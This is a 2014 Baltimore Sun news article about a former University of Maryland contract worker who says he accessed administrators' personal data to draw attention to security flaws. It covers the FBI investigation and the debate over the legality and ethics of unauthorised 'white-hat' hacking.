Former contract worker at UM says he accessed data to reveal problems
By SCOTT DANCE and The Baltimore Sun
Apr 09, 2014 | 9:50 PM
The FBI is investigating a former University of Maryland contract worker who said he took College Park administrators' personal information from the campus network and posted online about the stunt to draw attention to major security flaws.
David Helkowski said in an interview with The Baltimore Sun that he noticed vulnerabilities months before a February attack exposed nearly 300,000 sensitive records. Frustrated that issues continued even after he raised concerns while working on a university website, Helkowski said, he took the data to raise alarm.
FBI agents raided Helkowski's Parkville home last month after linking him to the breach, which exposed information including university President Wallace D. Loh's Social Security and cellphone numbers, according to court documents filed Monday.
Helkowski has not been charged with any wrongdoing, and he said in the interview that he considers himself a whistle-blower.
"I had to do it because if I did not do that, they wouldn't have acknowledged the seriousness of the problem," he said.
He said there may have been multiple points of entry through which hackers could have obtained sensitive information from the university's network, though his findings may not have prevented the breach of names, Social Security numbers and birth dates of 287,580 students, faculty and staff Feb. 18.
University officials said Helkowski did not access the data in the same way the larger breach occurred, but they declined to comment further, citing ongoing investigations.
The situation adds to a debate over the ethics of hacking. In many cases, online invaders cast themselves as heroes, like volunteer Internet police maintaining safety for consumers, but experts say hacking into sensitive data remains an ethical gray area — and can be illegal.
Helkowski said he was working on a website for the university's School of Public Health in November as an employee of the Canton Group when his computer's virus scanner popped up an alert.
It led him to a vulnerability that gave access to 80 databases, including some containing Social Security numbers, cellphone numbers and grades, he said.
An unusual batch of code appeared to have been uploaded to the website, and Helkowski said he later found similar code on other university websites. Known as shelfscripts, the sets of code wrap together multiple commands that can be activated at once.
The shelfscripts created a back door into the servers running the websites, which an attacker could use to access all the databases, he said. A web server is typically designed to connect only to the sources of data it needs to run, keeping sensitive or extraneous data separate, accessible only to those with the proper authorization.
Helkowski said he alerted his superiors at the Canton Group to the vulnerability when he found it in November, and again after Loh disclosed the data breach in February.
Convinced that his concerns were not being heard, Helkowski said he exploited the flaw from the outside, though he says he didn't access anything he didn't have permission to in his role at Canton Group.
"I was not gaining any more access than I already had officially," he said.
He said he sent an email March 15 to Loh and other members of a task force the university created to investigate the cyber attack, notifying them of his breach and warning them of a need to further tighten security.
The university revealed the breach March 20, but offered few details other than to say it exposed the personal information of a school official.
"I want UMD security to actually be improved, not just for people to say it is being improved," Helkowski wrote in a posting on the website pastebin.com in which he acknowledged, "I could very well get in a lot of trouble."
Helkowski said he and university information security officials traded emails after that, discussing the vulnerability and how to fix it. He said university officials thanked him. But the next day, FBI officials raided his home in the 8300 block of Oakleigh Road.
Helkowski said he cooperated with FBI agents, providing usernames and passwords as they combed his house for evidence, including flash drive storage devices, hard drives, a laptop and a document containing the terms of his employment with Canton Group. After telling his employers about the raid, he was let go, he said.
Helkowski publicly revealed details of the hacking on Wednesday to users of the website Reddit, in one of the message board's "Ask Me Anything" discussions.
Canton Group officials said in a statement that Helkowski is no longer employed there and that they are cooperating with all law enforcement investigations.
An FBI spokeswoman could not be reached for comment.
Helkowski said his aim was to improve information security, but FBI special agent Jeremy Bucalo cited in an affidavit probable cause that Helkowski violated federal law that bans unauthorized access of a protected computer.
Though so-called "white-hat" hackers — who intend to improve security rather than profit from breaches — may have good intentions, they can still rile their targets, as well as law enforcement agencies.
Universities in Canada and the United Kingdom have prosecuted self-proclaimed white-hat hackers.
In the U.S., hacker Andrew Alan Escher Auernheimer was sentenced to more than three years in prison and ordered to pay $73,000 in restitution for a breach of AT&T that exposed data on 114,000 iPad users, despite claiming to be one of "the good guys."
"If you haven't been specifically contracted to test a system, if you don't have in writing that this is going to be acceptable to an organization, it's something you should steer away from," said Lisa Yeo, an assistant professor of information systems and operations management at Loyola University Maryland. "You can't trust those people to always be willing to play by the rules. It's a very gray area."